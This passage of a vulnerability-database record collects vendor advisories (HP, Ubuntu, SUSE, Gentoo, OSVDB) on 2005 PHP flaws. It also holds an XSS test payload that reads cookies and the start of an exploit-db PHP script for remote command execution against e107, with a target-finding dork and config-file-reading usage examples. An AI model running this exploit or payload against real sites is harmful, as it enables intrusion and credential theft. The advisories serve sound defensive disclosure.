"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c00786522\r\nVersion: 1\r\n\r\nHPSBMA02159 SSRT061238 rev.1 - HP System Management Homepage (SMH), Remote Bypassing of Security Features or Cross Site Scripting or Denial of Service (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2006-11-01\r\nLast Updated: 2006-11-01\r\n\r\nPotential Security Impact: Remote security bypass or cross site scripting or Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified in PHP, an open source software component supplied with HP System Management Homepage (SMH). These vulnerabilities could by exploited remotely resulting in the bypassing of security features, cross site scripting, or Denial of Service (DoS).\r\n\r\nReferences: CVE-2005-2491, CVE-2005-3319, CVE-2005-3353, CVE-2005-3388, CVE-2005-3389, CVE-2005-3390, CVE-2005-3391, CVE-2005-3392\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) versions prior to 2.1.5 running on Linux and Windows.\r\n\r\nBACKGROUND\r\n\r\nRESOLUTION\r\n\r\nHP has provided System Management Homepage (SMH) version 2.1.5 or subsequent for each platform to resolve this issue.\r\n\r\nHP System Management Homepage for Linux (x86) version 2.1.5-146 can be downloaded from\r\nhttp://h18023.www1.hp.com/support/files/server/us/download/24193.html\r\n\r\nHP System Management Homepage for Linux (AMD64/EM64T) version 2.1.5-146 can be downloaded from\r\nhttp://h18023.www1.hp.com/support/files/server/us/download/24172.html\r\n\r\nHP System Management Homepage for Windows version 2.1.5-146 can be downloaded from\r\nhttp://h18007.www1.hp.com/support/files/server/us/download/23883.html\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHISTORY:\r\nVersion:1 (rev.1) - 1 November 2006 Initial Release\r\n\r\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."\r\n\r\n\u00a9Copyright 2006 Hewlett-Packard Development Company, L.P.\r\n\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBRUngl+AfOvwtKn1ZEQJI1ACghtQW/CXAVNRAxIC/WF3Y0xky2IIAoMN7\r\nFrK+8N5WxaHjk6DRS1Kw/q/Q\r\n=GCt9\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-11-03T00:00:00", "published": "2006-11-03T00:00:00", "id": "SECURITYVULNS:DOC:14915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14915", "title": "[security bulletin] HPSBMA02159 SSRT061238 rev.1 - HP System Management Homepage (SMH), Remote Bypassing of Security Features or Cross Site Scripting or Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-3388", "CVE-2007-1287"], "description": "Buffer overflows, integer overflows, DoS conditions, crossite scripting.", "edition": 1, "modified": "2007-03-04T00:00:00", "published": "2007-03-04T00:00:00", "id": "SECURITYVULNS:VULN:1818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1818", "title": "Multiple PHP bugs", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2020-07-09T19:34:21", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "Eric Romang discovered a local Denial of Service vulnerability in the \nhandling of the 'session.save_path' parameter in PHP's Apache 2.0 \nmodule. By setting this parameter to an invalid value in an .htaccess \nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an \nimage with specially crafted EXIF data to a PHP program that \nautomatically evaluates them (e. g. a web gallery), a remote attacker \ncould cause an infinite recursion in the PHP interpreter, which caused \nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the \nphpinfo() function. By tricking a user into retrieving a specially \ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker \ncould inject arbitrary HTML or web script into the output page and \npossibly steal private data like cookies or session identifiers. \n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function \nwhen it is called with just one argument. By calling such programs \nwith specially crafted parameters, a remote attacker could enable the \n'register_globals' option which is normally turned off for security \nreasons. Once this option is enabled, the remote attacker could \nexploit other security flaws of PHP programs which are normally \nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the \n$GLOBALS array in PHP programs that allow file uploads and run with \n'register_globals' enabled. Depending on the particular application, \nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check \nprocessed file names against the 'open_basedir' and 'safe_mode' \nrestrictions, which could be exploited to circumvent these \nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was \nfound in virtual() function. A local attacker could exploit this to \ncircumvent these restrictions with specially crafted PHP INI files \nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for \ninvalid embedded line breaks. By setting the 'To:' field of an email \nto a specially crafted value in a PHP web mail application, a remote \nattacker could inject arbitrary headers into the sent email. \n(CVE-2005-3883)", "edition": 5, "modified": "2005-12-23T00:00:00", "published": "2005-12-23T00:00:00", "id": "USN-232-1", "href": "https://ubuntu.com/security/notices/USN-232-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:51:27", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "description": "Updated PHP packages fix the following security issues: - Stefan Esser found out that a bug in parse_str() could lead to activation of register_globals (CVE-2005-3389) and additionally that file uploads could overwrite $GLOBALS (CVE-2005-3390) - Bugs in the exif code could lead to a crash (CVE-2005-3353) - Missing safe_mode checks in image processing code and cURL functions allowed to bypass safe_mode and open_basedir (CVE-2005-3391) - Information leakage via the virtual() function (CVE-2005-3392) - Missing input sanitation in the mb_send_mail() function potentially allowed to inject arbitrary mail headers (CVE-2005-3883) The previous security update for php caused crashes when mod_rewrite was used. The updated packages fix that problem as well.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2005-12-14T16:26:50", "published": "2005-12-14T16:26:50", "id": "SUSE-SA:2005:069", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-12/msg00012.html", "type": "suse", "title": "remote code execution in php4,php5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:09", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "description": "### Background\n\nPHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version and also stand-alone in a CLI. \n\n### Description\n\nMultiple vulnerabilities have been found and fixed in PHP: \n\n * a possible $GLOBALS variable overwrite problem through file upload handling, extract() and import_request_variables() (CVE-2005-3390)\n * a local Denial of Service through the use of the session.save_path option (CVE-2005-3319)\n * an issue with trailing slashes in allowed basedirs (CVE-2005-3054)\n * an issue with calling virtual() on Apache 2, allowing to bypass safe_mode and open_basedir restrictions (CVE-2005-3392)\n * a problem when a request was terminated due to memory_limit constraints during certain parse_str() calls (CVE-2005-3389)\n * The curl and gd modules allowed to bypass the safe mode open_basedir restrictions (CVE-2005-3391)\n * a cross-site scripting (XSS) vulnerability in phpinfo() (CVE-2005-3388)\n\n### Impact\n\nAttackers could leverage these issues to exploit applications that are assumed to be secure through the use of proper register_globals, safe_mode or open_basedir parameters. Remote attackers could also conduct cross-site scripting attacks if a page calling phpinfo() was available. Finally, a local attacker could cause a local Denial of Service using malicious session.save_path options. \n\n### Workaround\n\nThere is no known workaround that would solve all issues at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n\nAll mod_php users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n\nAll php-cgi users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi", "edition": 1, "modified": "2005-11-13T00:00:00", "published": "2005-11-13T00:00:00", "id": "GLSA-200511-08", "href": "https://security.gentoo.org/glsa/200511-08", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3390"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015129\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18054](https://secuniaresearch.flexerasoftware.com/advisories/18054/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20407](https://vulners.com/osvdb/OSVDB:20407)\n[Related OSVDB ID: 20406](https://vulners.com/osvdb/OSVDB:20406)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0005.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://www.hardened-php.net/advisory_202005.79.html\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0647.html\nKeyword: HPSBMA02159,SSRT061238\n[CVE-2005-3390](https://vulners.com/cve/CVE-2005-3390)\nBugtraq ID: 15250\n", "modified": "2005-10-31T14:12:43", "published": "2005-10-31T14:12:43", "href": "https://vulners.com/osvdb/OSVDB:20408", "id": "OSVDB:20408", "type": "osvdb", "title": "PHP File-Upload $GLOBALS Array Overwrite", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3353"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://bugs.php.net/bug.php?id=34704\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=303382)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:19064](https://secuniaresearch.flexerasoftware.com/advisories/19064/)\n[Secunia Advisory ID:22713](https://secuniaresearch.flexerasoftware.com/advisories/22713/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18054](https://secuniaresearch.flexerasoftware.com/advisories/18054/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0005.html\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1206\nNews Article: http://www.informationweek.com/news/showArticle.jhtml;?articleID=181500394\nKeyword: HPSBMA02159,SSRT061238\n[CVE-2005-3353](https://vulners.com/cve/CVE-2005-3353)\nBugtraq ID: 15358\n", "modified": "2005-10-02T00:00:00", "published": "2005-10-02T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:21492", "id": "OSVDB:21492", "title": "PHP exif_read_data Malformed JPEG DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3388"], "edition": 1, "description": "## Vulnerability Description\nPHP contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input (i.e. crafted URL with a stacked array assignment) passed to the phpinfo() function. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 4.4.1, 5.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate input (i.e. crafted URL with a stacked array assignment) passed to the phpinfo() function. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nphpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_4_1.php\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015130\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20407](https://vulners.com/osvdb/OSVDB:20407)\n[Related OSVDB ID: 20408](https://vulners.com/osvdb/OSVDB:20408)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://www.hardened-php.net/advisory_182005.77.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0645.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0653.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0652.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0659.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0650.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0093.html\nKeyword: HPSBMA02159,SSRT061238\nISS X-Force ID: 10355\n[CVE-2005-3388](https://vulners.com/cve/CVE-2005-3388)\nBugtraq ID: 15248\n", "modified": "2005-10-31T00:00:00", "published": "2005-10-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:20406", "id": "OSVDB:20406", "type": "osvdb", "title": "PHP phpinfo() Function Stacked Array Assignment XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3389"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2005/0062/)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-037.htm)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=c00786522)\nSecurity Tracker: 1015131\n[Secunia Advisory ID:17666](https://secuniaresearch.flexerasoftware.com/advisories/17666/)\n[Secunia Advisory ID:17757](https://secuniaresearch.flexerasoftware.com/advisories/17757/)\n[Secunia Advisory ID:17557](https://secuniaresearch.flexerasoftware.com/advisories/17557/)\n[Secunia Advisory ID:18669](https://secuniaresearch.flexerasoftware.com/advisories/18669/)\n[Secunia Advisory ID:17371](https://secuniaresearch.flexerasoftware.com/advisories/17371/)\n[Secunia Advisory ID:17490](https://secuniaresearch.flexerasoftware.com/advisories/17490/)\n[Secunia Advisory ID:17531](https://secuniaresearch.flexerasoftware.com/advisories/17531/)\n[Secunia Advisory ID:17510](https://secuniaresearch.flexerasoftware.com/advisories/17510/)\n[Secunia Advisory ID:21252](https://secuniaresearch.flexerasoftware.com/advisories/21252/)\n[Secunia Advisory ID:22691](https://secuniaresearch.flexerasoftware.com/advisories/22691/)\n[Secunia Advisory ID:18054](https://secuniaresearch.flexerasoftware.com/advisories/18054/)\n[Secunia Advisory ID:18198](https://secuniaresearch.flexerasoftware.com/advisories/18198/)\n[Related OSVDB ID: 20408](https://vulners.com/osvdb/OSVDB:20408)\n[Related OSVDB ID: 20406](https://vulners.com/osvdb/OSVDB:20406)\nRedHat RHSA: RHSA-2006:0549\nRedHat RHSA: RHSA-2005:831\n\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Dec/0005.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-08.xml\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20051101-01-U.asc\nOther Advisory URL: http://www.hardened-php.net/advisory_192005.78.html\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2005:213\nOther Advisory URL: http://www.ubuntu.com/usn/usn-232-1\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0646.html\nKeyword: HPSBMA02159,SSRT061238\n[CVE-2005-3389](https://vulners.com/cve/CVE-2005-3389)\nBugtraq ID: 15249\n", "modified": "2005-10-31T14:12:43", "published": "2005-10-31T14:12:43", "href": "https://vulners.com/osvdb/OSVDB:20407", "id": "OSVDB:20407", "type": "osvdb", "title": "PHP parse_str() memory_limit Request Termination register_globals Manipulation", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T03:36:49", "description": "PHP 4.x/5.0.x File Upload GLOBAL Variable Overwrite Vulnerability. CVE-2005-3390. Remote exploit for php platform", "published": "2005-10-31T00:00:00", "type": "exploitdb", "title": "PHP 4.x/5.0.x File Upload GLOBAL Variable Overwrite Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3390"], "modified": "2005-10-31T00:00:00", "id": "EDB-ID:26443", "href": "https://www.exploit-db.com/exploits/26443/", "sourceData": "source: http://www.securityfocus.com/bid/15250/info\r\n\r\nPHP is prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests.\r\n\r\nBy exploiting this issue, remote attackers may be able to overwrite the GLOBAL variable. This may allow attackers to further exploit latent vulnerabilities in PHP scripts.\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\ne107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands\r\nexecution exploit\r\nby rgod rgod@autistici.org\r\nsite: http://retrogod.altervista.org\r\ndork: \"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files\r\n--------------------------------------------------------------------------------\r\n');\r\n/*\r\nworks with register_globals=On\r\nagainst PHP < 4.4.1, 5 < PHP < 5.0.6\r\n*/\r\nif ($argc<4) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path cmd OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to e107\r\ncmd: a shell command\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /e107/ ls -la -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /e107/ cat ./../../../../e107_config.php -p81\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n/*\r\nsoftware site: http://e107.org/\r\n\r\nvulnerable code in class2.php near lines 29-37:\r\n...\r\n// Destroy! (if we need to)\r\nif($register_globals == true){\r\n\twhile (list($global) = each($GLOBALS)) {\r\n\t\tif (!preg_match('/^(_POST|_GET|_COOKIE|_SERVER|_FILES|GLOBALS|HTTP.*|_REQUEST|retrieve_prefs|eplug_admin)$/', $global)) {\r\n\t\tunset($$global); [**]\r\n\t\t}\r\n\t}\r\n\tunset($global);\r\n}\r\n...\r\nand in e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php near lines 26-40:\r\n\r\n...\r\nrequire_once(\"../../../../class2.php\");\r\nif (!defined('e107_INIT')) { exit; }\r\nunset($tinyMCE_imglib_include); //[*]\r\n\r\n// include image library config settings\r\ninclude 'config.php';\r\n\r\n$request_uri = urldecode(empty($HTTP_POST_VARS['request_uri'])?(empty($HTTP_GET_VARS['request_uri'])?'':$HTTP_GET_VARS['request_uri']):$HTTP_POST_VARS['request_uri']);\r\n\r\n// if set include file specified in $tinyMCE_imglib_include\r\n\r\nif (!empty($tinyMCE_imglib_include))\r\n{\r\n include $tinyMCE_imglib_include; ///[***]\r\n}\r\n...\r\n\r\nyou can evade [*] by sending the hash keys of $tinyMCE_imglib_include var and\r\n[**] (this *should* unsets the hash keys...) by sending a multipart/form-data\r\nrequest with the \"GLOBALS\" var\r\n\r\nhere [***] the code will include the temporary file and execute our shellcode\r\n\r\nsee http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html\r\nand http://www.hardened-php.net/advisory_202005.79.html\r\n\r\nfor details about this php vulnerabilities\r\n*/\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo 